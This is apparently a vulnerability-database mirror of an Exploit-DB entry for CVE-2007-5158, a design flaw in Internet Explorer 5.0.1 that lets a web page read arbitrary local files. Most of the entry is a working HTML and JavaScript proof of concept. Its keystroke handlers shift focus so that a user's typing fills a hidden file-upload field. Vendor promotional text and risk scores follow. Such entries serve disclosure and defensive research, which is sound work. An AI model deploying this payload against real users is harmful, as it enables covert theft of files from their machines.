Microsoft Internet Explorer 5.0.1 - Arbitrary File Upload
🗓️ 27 Sep 2007 00:00:00Reported by Ronald van den HeetkampType
exploitdb🔗 www.exploit-db.com👁 32 Views
| Reporter | Title | Published | Views | Family All 4 |
|---|---|---|---|---|
| CVE-2007-5158 | 1 Oct 200700:00 | – | cve | |
| CVE-2007-5158 | 1 Oct 200700:00 | – | cvelist | |
| CVE-2007-5158 | 1 Oct 200705:17 | – | nvd | |
| Design/Logic Flaw | 1 Oct 200705:17 | – | prion |
source: https://www.securityfocus.com/bid/25836/info
Microsoft Internet Explorer is prone to an information-disclosure vulnerability that allows attackers to gain access to the contents of arbitrary files.
This issue stems from a design error resulting from the improper handling of form fields.
This issue is similar to the one described in BID 24725 (Mozilla Firefox OnKeyDown Event File Upload Vulnerability).
# based upon Hong's exploit:
# http://sla.ckers.org/forum/read.php?3,13142
<script>
function Clear() {
document.getElementById("label1").htmlFor="file1";
document.getElementById("text1").focus();
}
function Down() {
document.getElementById("file1").focus();
}
</script>
<input type="file" id="file1" name="file1" onkeydown="Clear()" onkeyup="Clear()" />
<label id="label1" name="label1"></label>
<br />
<textarea name="text1" id="text1" onkeydown="Down()">
</textarea>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jan 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.15009